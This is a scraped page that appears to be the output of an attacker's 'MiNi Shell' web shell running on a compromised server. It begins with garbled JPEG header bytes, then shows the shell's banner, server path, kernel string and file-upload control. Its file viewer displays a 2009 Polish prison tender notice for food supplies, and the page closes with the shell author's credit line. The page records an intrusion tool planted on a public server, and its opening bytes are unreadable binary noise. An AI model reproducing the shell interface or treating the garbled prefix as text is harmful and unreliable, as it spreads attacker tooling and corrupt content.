JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090519/154934-N-2009.html

<p class="kh_header"><b>Grudziądz: Dostawy artykułów spożywczych. Dkw/220/04/2009</b><br>
<b>Numer ogłoszenia: 154934 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny nr 2 , ul. Sikorskiego 13/17, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 6421460 w. 280, faks 056 6421398.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych. Dkw/220/04/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp./Nazwa produktu/Kod CPV/Norma/Ilość szacunkowa [kg/l]
Część 1 - Konserwy mięsne
1/Konserwa mięsna (typu mielonka) 300 g (z otwieraczem)/15131000-5/PN-A-82022/500
2/Pasztet drobiowy 100-150 g opakowanie typu alupak/15131310-1/PN-A-86525/200
3/Pasztet drobiowy 300 g
(z otwieraczem)/15131310-1/PN-A-86525 /500
4/Pasztet mazowiecki 300 g
(z otwieraczem)/15131310-1/PN-A-86525/500
Część 2 - Warzywa, owoce przetworzone
1/Chrzan tarty z kwaskiem cytrynowym  opakowanie do 1 kg/15871000-4/PN-R-75520:1993/150
2/Dżem opakowania 25-80 g/15332290-3/PN-A-75100/50
3/Dżem opakowania do 15 kg/15332290-3/PN-A-75100/1100
4/Groszek konserwowy opakowanie do 1 kg/15331462-3/PN-76/A-77803/250
5/Koncentrat pomidorowy 30% opakowanie do 1 kg/15331427-6/PN-75/A-77601/100
6/Koncentrat pomidorowy 30% opakowanie do 5 kg/15331462-3/PN-76/A-77803/2000
7/Marmolada  opakowanie do 15 kg/15332230-5/PN-93/A-75103/1100
8/Miód sztuczny opakowanie do 15 kg/15831600-8/PN-82/A-74760/450
9/Puree ziemniaczane opakowanie do 25 kg/15313000-5/PN-A-74722/400
Część 3 - Przetwory zbożowe
1/Kasza jęczmienna gruba opakowanie do 50 kg/15613100-9/PN-A-74203/1500
2/Kasza manna opakowanie do 50 kg/15613100-9/PN-A-74036/300
3/Makaron - świderki, kolanka, rurki opakowanie do 20 kg/15851100-9/PN-A-74131/2900
4/Makaron - Nitki opakowanie do 20 kg/15851100-9/PN-A-74131/600
5/Mąka pszenna typu 500  opakowanie do 50 kg/15612100-2/PN-A-74022/2200
6/Ryż łuskany biały długoziarnisty opakowanie do 50 kg/15611000-4/PN-ISO 7301/1500
Część 4 - Instanty
1/Barszcz czerwony opakowanie do 30 kg/15891000-0/PN-A-94050/150
2/Kisiel opakowanie do 5 kg/15800000-6/PN-A-94051/100
3/Przyprawa w płynie (typu magii) opakowanie do 1 kg/15890000-3/PN-A-94052/600
4/Przyprawa warzywna
(typu jarzynka) opakowanie do 30 kg/15890000-3/PN-A-94052/900
5/Rosół z kury opakowanie do 30 kg/15891000-0/PN-A-94052/1800
6/Sos boloński opakowanie do 30 kg/15871260-4/PN-A-94050/280
7/Sos cygański opakowanie do 30 kg/15871260-4/PN-A-94050/250
8/Sos grzybowy opakowanie do 30 kg/15871260-4/PN-A-94050/150
9/Zupa ogonowa opakowanie do 30 kg/15891000-0/PN-A-94050/200
10/Zupa pieczarkowa opakowanie do 30 kg/15891000-0/PN-A-94050/200
11/Zupa żurek opakowanie do 30 kg/15891000-0/PN-A-94050/250
Część 5 - Przyprawy
1/Bazylia suszona opakowanie 0.1 kg/15872300-4/PN-A-86959/5
2/Carry opakowanie 0.1 kg/15871270-7/PN-A-86967/5
3/Cynamon mielony opakowanie do 0,1 kg/15872200-3/BN-68/8132-09/5
4/Czosnek suszony granulowany opakowanie do 0,1 kg15871000-4/PN-R-75518/8
5/Herbata granulowana opakowanie do 10 kg/15863000-5/PN-ISO3720/280
6/Kawa zbożowa opakowanie do 30 kg/15861000-1/PN-A-79010/800
7/Kminek opakowanie do 0,1 kg/15872000-1/PN-A-86953/5
8/Koperek suszony opakowanie do 0,1 kg/15893000-4/PN-63/A-77603/10
9/Kwasek cytrynowy - spożywczy opakowanie do 0,1 kg/15880000-0/PN-81/A-79734/15
10/Liść laurowy opakowanie do 0,1 kg/15890000-3/PN-82/R-87011/18
11/Majeranek opakowanie do 0,1 kg/15890000-3/PN-A-86958/40
12/Majonez opakowanie do 1 kg/15871273-8/PN-A-86950/150
13/Mleko w proszku odtłuszczone opakowanie do 25 kg  /15511700-0/PN-92/A-86024/100
14/Musztarda opakowanie do 1 kg/15871250-1/PN-A-86964/300
15/Ocet Spirytusowy 10% opakowanie do 1 l/15871110-8/PN-EN 13188/250
16/Oregano suszone opakowanie do 0,1 kg/15872300-4/PN-A-86967/5
17/Papryka ostra opakowanie do 0,1 kg/15890000-3/PN-A-86955/30
18/Papryka słodka opakowanie do 0,1 kg/15890000-3/PN-A-86955/40
19/Pieprz naturalny mielony opakowanie do 0,1 kg/15872100-2/PN-A-86965/40
20/Przyprawa do mięsa mielonego opakowanie do 0,1 kg/15871270-7/PN-A-86967/10
21/Przyprawa do ryb opakowanie do 0,1 kg/15871270-7/PN-A-86967/5
22/Sól spożywcza jodowana opakowanie do 50 kg/15872400-5/PN-C-84081-2/1100
23/Ziele angielskie opakowanie do 0,1 kg/15890000-3/PN-A-86955/20
24/Zioła prowansalskie opakowanie do 0,1 kg/15872000-1/PN-A-86967/5
Cześć 6 - Wyroby z soi
1/Kotlet sojowy (schabowy) opakowanie do 30 kg/15890000-3/PN-ISO 5506/260
2/Soja granulat opakowanie do 30 kg/15890000-3/PN-ISO 5506/100
3/Soja kostka opakowanie do 30 kg/15890000-3/PN-ISO 5506/200
Cześć 7 - Rośliny strączkowe
1/Fasola Jaś drobna opakowanie do 50 kg/01121210-6/PN-75/R65031/700
2/Fasola Jaś gruba opakowanie do 50 kg/01121213-7/PN-75/R65031/600
3/Groch łuskany opakowanie do 50 kg/01112213-1/PN-81/R65032/800
Cześć 8 - Olej spożywczy
1/Olej spożywczy opakowanie do 10 l/15411100-3/PN-A-86901/1800
Cześć 9 - Cukier
1/Cukier opakowanie do 50 kg/15831200-4/PN-A-74850/5400.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.13.00.00-8, 15.33.00.00-0, 15.61.00.00-7, 15.89.00.00-3, 15.87.00.00-7, 03.11.00.00-5, 15.41.11.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się osoby (wykonawcy), które spełniają warunki określone w art. 22 ustawy pzp1 oraz nie podlegają wykluczeniu
w przypadkach określonych w art. 24  w/w ustawy. 
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp2. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia / nie spełnia, na podstawie oświadczeń i dokumentów wymienionych w punkcie 8 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty, jakie należy dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
Łącznie z ofertą należy złożyć pod rygorem wykluczenia z postępowania n/w dokumenty:
8.1  Aktualny /wystawiony nie wcześniej niż 6 miesięcy przed terminem składania ofert/ odpis właściwego rejestru (osoba fizyczna - aktualny odpis zaświadczenia o wpisie do ewidencji działalności gospodarczej) w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.
8.2  Wypełniony załącznik nr 1 stanowiący ofertę cenową.
8.3  Oświadczenie wykonawcy stanowiące załącznik  nr 2 i 3 do SIWZ.
8.4 Parafowany projekt umowy załącznik nr 4 do SIWZ
W przypadku składania ofert przez podmioty występujące wspólnie, do oferty należy załączyć dokumenty wymienione w pkt. 8.1 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie. 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt -8.1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto likwidacji ani nie ogłoszono upadłości;
    (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienia;
    (wystawione nie wcześniej niż 6 miesiące przed upływem terminu składania ofert)
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt - 3
zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Zaświadczenia i informacje, których żąda zamawiający muszą być aktualne, sporządzone w j. polskim lub zawierające tłumaczenie na język polski..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Nr 2
ul. Sikorskiego 13/17
86-300 Grudziądz,
sekretariat..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2009 godzina 11:00, miejsce: Zakład Karny Nr 2
ul. Sikorskiego 13/17
86-300 Grudziądz,.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com